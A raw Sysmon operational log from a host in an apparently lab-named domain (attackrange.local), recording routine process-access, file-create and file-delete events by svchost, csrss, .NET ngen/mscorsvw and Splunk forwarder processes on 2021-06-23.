21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.888{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:56.798{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.767{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:56.767{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:56.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F8-60D3-1804-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F8-60D3-1804-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:56.545{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F8-60D3-1804-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:56.498{4DB9351A-A1F7-60D3-1704-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\16c4-0\Microsoft.Windows.ServerManager.ServerComponentManager.dll2021-06-23 21:04:56.498 23542300x800000000000000021146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:56.404{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A680053146FD693DE04919BE6B9010E,SHA256=02E875EB61F0F6686C09E4CBBB36D937D7AEF8B10DCF3619A12170FF065129D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.154{4DB9351A-A1F7-60D3-1604-00000000CF01}65925328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:55.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F7-60D3-1704-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.973{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-2104-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.942{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-2104-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.942{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-2104-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
11241100x800000000000000021186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:04:57.880{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1af0-0\Microsoft.Workflow.Compiler.exe2021-06-23 21:04:57.880 10341000x800000000000000021185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.817{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.770{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.770{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.580{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1F04-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.564{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B533A7D1946950ED0CFF3E04F67F8C,SHA256=9E09FEF25963727D487DE8620A164294D4B4C7318E2F9D9ED6FF017C63AEEC03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.564{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1F04-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.548{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1F04-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 